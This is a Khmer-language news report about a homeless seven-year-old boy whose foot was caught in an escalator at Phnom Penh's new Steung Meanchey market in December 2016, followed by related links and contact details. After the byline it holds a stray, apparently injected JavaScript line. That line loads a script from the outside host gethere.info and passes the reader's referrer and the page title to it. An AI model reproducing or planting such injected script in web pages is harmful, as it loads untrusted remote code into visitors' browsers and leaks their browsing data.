សូមប្រយ័ត្ន!កុមារាម្នាក់ជាប់ជើងនឹងជណ្ដើរយន្ដខណៈ រត់ប្រដេញគ្នាលេងនៅក្នុងផ្សារស្ទឹងមានជ័យ(វីដេអូ)

4 ខែ មុន 203 តូ សុផល

ភ្នំពេញ៖ កុមារាម្នាក់បានជាប់ជើងនឹងជណ្ដើរយន្ដ ខណៈរត់ប្រដេញគ្នាលេងនៅក្នុងផ្សារស្ទឹងមានជ័យថ្មី។ ហេតុការណ៍នេះបង្កឲ្យមានការភ្ញាក់ផ្អើលកាលពីវេលាម៉ោង ៥ នឹង ៥០ នាទីល្ងាចថ្ងៃទី ៣០ ខែធ្នូ ឆ្នាំ ២០១៦ស្ថិតនៅក្នុងផ្សារស្ទឹងមានជ័យថ្មី សង្កាត់ស្ទឹងមានជ័យ ខណ្ឌមានជ័យ។ កុមារារងគ្រោះមានឈ្មោះ ថុល សូនី អាយុ ៧ឆ្នាំជាក្មេងអនាថាគ្មានទីពឹងដោយសព្វថ្ងៃដើររើសអេដចាយ ជាមួយបងប្រុសពីរនាក់ទៀតដោយគ្មានទីលំនៅច្បាស់លាស់យប់ត្រង់ណាដេកត្រង់នោះ។

បើតាមការបញ្ជាក់ពីក្មេងប្រុសពីរនាក់ទៀតដែលត្រូវជាបងប្រុសក្មេងរងគ្រោះបានឲ្យដឹងថា សព្វថ្ងៃម្ដាយពួកគេកំពុងសម្រាកព្យាបាលនៅមន្ដីពេទ្យរុស្សីដោយមានជំងឺខ្វះគ្រាប់ឈាម ចំណែកឪពុកវិញដើរសុំទានគេមិនដឹងថាដើរទៅដល់ទីនោះណានោះទេ ប្រភពដដែលបានបន្ដថាមុនពេលកើតហេតុនោះពួកគេបាននាំមកលេងក្នុងផ្សារស្ទឹងមានជ័យថ្មីហើយបានរត់ប្រដេញប្រលែងគ្នាលេង លុះមកដល់ចំណុចកើតហេតុនៅជណ្ដើរយន្ដជាន់ទីពីរស្រាប់ តែប្អូនរបស់គេបានជាប់ជើងនៅជណ្ដើរយន្ដតែម្ដង។ ភ្លាមៗនោះប្រធានផ្សារបានឲ្យផ្អាកដំណើរការជណ្ដើរយន្ដដើម្បីជួយសង្គ្រោះដល់ក្មេងរងគ្រោះ ដោយចំណាយពេលរហូតដល់ទៅជាងពីរម៉ោង ទើបអាចជួយក្មេងរងគ្រោះបានសម្រេច ក្រោយពេលសង្គ្រោះរួចមកឃើញថាកុមារា ថុល សូនី បានរងរបួសស្រាលនូវផ្នែកស្មងជើងខាងឆ្វេង។ បច្ចុប្បន្នកុមារារងគ្រោះកំពុងសម្រាកព្យាបាលនូវមន្ទីពេទ្យរុស្ស៊ី។

រុស្សី។

ដោយ អាត ចន្ធូ

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អាន៖  ស្ទាវ២ក្រុមផឹកស៊ីក្នុងហាងគ្រួសារ៥៥៥វាយតប់គ្នារបួសធ្ងន់ទាំងសងខាង

 

 

TOP
 

ទំនាក់ទំនង

លេខទូរស័ព្ទ: 0974444174, 017987600, 081810811 ម៉ោងធ្វើការ: ច័ន្ទ - សុក្រ ​​ (8am - 5pm) អុីមែល: info@tnn-news.com

បណ្តាញសង្គម